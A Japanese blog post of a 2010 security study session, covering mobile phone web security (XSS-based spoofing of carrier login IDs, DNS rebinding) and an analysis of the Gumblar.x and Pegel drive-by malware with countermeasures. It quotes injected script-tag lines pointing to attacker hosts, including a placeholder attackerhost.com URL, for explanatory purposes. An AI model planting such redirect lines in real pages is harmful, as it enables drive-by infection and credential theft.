2010年2月20日に開催された,第3回東北情報セキュリティ勉強会に行ってきました。主催なさった方,講師の方々,会場を手配くださった岩手県立大学の高田先生,ならびに学生様ありがとうございました。
参加したのはセキュリティトラック系。noteから更に抜粋に加え,自分のと思ったこと書きなぐってみます。
「近年のモバイル端末に関するセキュリティ」
- 日本の携帯は初めっから安全に振られている。しかし,新しい機能を入れたら,それは大丈夫だろうか。
- 携帯のブラウザにはCookieの概念がない。個体識別番号 (携帯 UID) + src IP アドレスfilterでセキュリティを確保。更にUAを加えて,携帯電話とPCとの判別をしている。 (自分 個体識別番号が盗まれたとき,engress filterをかましていないISPからUAを偽造してアクセスされたらどうなるのだろうか。まだengress filterをかましていないISPはあるだろう?)
- (自分 高木浩光@自宅の日記 - 日本のインターネットが終了する日をもう一回理解する必要がある)
- USER_AGENT変更ツール FireMobileSimulator (Firefox add-on)
- 携帯JavaScriptとXSSの組み合わせによる「かんたんログイン」なりすましの可能性
XSSの脆弱性を利用して,攻撃用JavaScriptを読みこませる。XMLHttpRequest.setRequestHeader を用いて他人のUIM,iモードIDを産めこむ。 対策 docomo の proxy server 側 で setRequestHeader を無効にした。 - 新しい機能を実行したら,パソコン関係ではスルーしてしまう問題は,日本の携帯キャリア・ベンダーは対応が早い。
- iモード専用サイトのhtmlソースの閲覧方法 DNS rebindingを用い,JavaScriptのクロスドメイン制限を回避。(自分 というか,webサイトでソース見られたらまずい実装するのはどうなのか?。DNSの運用の問題?DNSSECは?)
- Exploiting Smartphone系,iPhone (携帯電話と違い,比較的自由な開発環境)。開発も環境もオープンなため,様々なリサーチが行われている。
- ARMのexploit codeのdemo (Thumb命令とARM命令を両立させて 0x00を消去する)。OSでも対策はある。W^X 。書き込み(W)と実行(X)を天分にする仕様
- 書き込みできるメモリ空間は実行できず,実行できるメモリ空間は書き込みできない
- OpenBSDが採用,mprotect で切り替え可
- Application側でport listenして,そのlistenしている applicationにvulnerability があれば,攻撃の対象になる。
- JailBreak,マジコン,PSPのCF。ハードウェアをハックされてしまうとどうしようもない。ハックされないようなハードウェアの設計?OSの設計?
- 携帯電話はWeb系のセキュリティが主流
- 携帯ブラウザのAjax, JavaScript関連
- martphoneは比較的OSやハードウェアに近い部分のセキュリティがメイン
- iPhoneのjailbreakなど
SmartphoneにターゲットしたJavaScriptコードはどうなるのか?現状,webkitを使用しているので,様問題があるのならば,pcアプリにも同様の問題があるということ。なので対応は早いのではないのか?
Gumblar.x を除いてみた。 メモのみ
Googleで検索する。
対策はひっかかるが。
- Web誘導感染型 (1段階置いて, phising?Web誘導)
- FTPアカウントの搾取
- Webサイトの改竄 ? (盗んだFTPパスワードを取得して,改竄する)
- SQL injection で改竄されても Gumblar?
- Phishing なのに Gumblar?
Gumblarを分類する
- Gumblar.x
- *.ru:8080 (GNU GPL)
Gumblar.x
GENOウィルス = Gumblar 2009年春ごろ
Gumblar 亜種 (Gumblar.x) 2009年10月中旬ごろ-
GENOウィルスの絵 (sourceが難読化されている)
-> document.write("<script src=attacker's siteURL></script>");
Gumblar.X
</head>
<script src="http://***.php">></script> (飛び先も正規サイト)
<body>
見に行っただけで感染
Pegel.*
*.ru:8080 - 2009年12月頃
難読化されたコード
Gumblar-x Pegel との比較
利用される脆弱性 Adobe Reader,Flash MSOfficeWeb, IE Gumblar-x
Adobe Reader, MDAC, SnapShotViewer, JRE Pegel
QuickTimer を使うのもある
感染後の動作 FTPアカウントの摂取,rootkit
自分自身のupdate Gumblar-x
Downloader(他のマルウェアを落とす), 偽アンチウィルス,SpamBot Pegel
国内感染情報 3000以上 (Gumblar-x) 350以上 (Pegel) (クローラーで見ているので,数値にはあまり意味がないのかもしれない。)
Pegelは12月終わりごろから出現
今日の話は Gumblar-x の話
Attack Flow
Redirect <script src="*php"%gt; %gt;- これが正規のホストであるので,この段階での検出はNGの可能性が高い。
Browser Check (UAを確認,未対応は404を返す初めのころはOpera,Firefox等ははじいていた)
wgetやweb emulatrion
難読化されたJavaScriptをdownload
アクセスしてきたPCの環境をチェックして,該当するexploitをdownloadする。(Active-Xなど)
downloaderが落としてきたペイロードを脆弱性があるapplicationが実行して,
更に次の攻撃先にアクセスする。
最後に,exeが落ちてきて,実行する。
PDFのフライトレコード (PDFの暗号化,zlibで暗号化)
CWS Exploit (FWSをzlibで暗号化したやつ)
いずれにせよ,コアな部分は http://attackerhost.com/gumblar.php? <- このURLにアクセスさせる。
EXE <- Kates (Danol) と呼ばれている
-> DLL を作成
-> Processにインジェクション
-> 再起動後,真っ暗な画面になる。
DEMO
レジストリの隠蔽
感染ファイルの保護
ツールの妨害
- regmon.exe
- filemon.exe
- gmer.exe (rootkit killer)
- avz.exe (rootkit killer)
Hidden Packet
C&C との通信
Xost: www.google.co.jp (グーグル searchを実行した時に大量に振ってくるパケットに偽造して IPSにひっかからないようにしている)
UPDATE
(自己消滅するものも?)
FTP情報の窃盗 (Header S0:S1 に FTPのaccountをのせている)
Anti Anti-Virus for
IET / HTTP/1.1 ? なんで IET (オンラインスキャンも,trial version もdownloadできなくする)
CLEANING DEMO
Gumblar対策
感染予防
OS/Software Update
Anti Virus softわれの導入
ScriptやActive XのOff
- Adobe製品,Webブラウザ
パスワードの管理を徹底する?
- 保存しない
- 平文で送らない
- 定期的に更新する
仮想化を使う
- VMware
- サンドボックス
あとは運を天に任せる
感染してしまったら
- 感染PCの処理
+ ウィルスの駆除
+ OSのリカバリ
- Webページの修正
- パスワードの変更
- Backdoorの削除
- 謝罪文ページの作成
自分のnote難読化されたJavaScript (そもそも何でそんなことが置きているのか)
unescape, escape コードを動的に生成する。
自分はunix系サーバーなので,Gumblarなんて関係ないよと思ってはいけない。
侵入されたら,<script src="*php"> >-ー これが正規のホスト が埋めこまれるので,感染の土台となる。 passwordの管理。application作者は,生でpasswordを保存してはいけない。セキュアなpasswordの扱い方を。(core-dumpされても大丈夫なように)。IPAのセキュア・プログラミング講座の附則の事態対策など読んでおくべき。
大変だ…。
No comments:
Post a Comment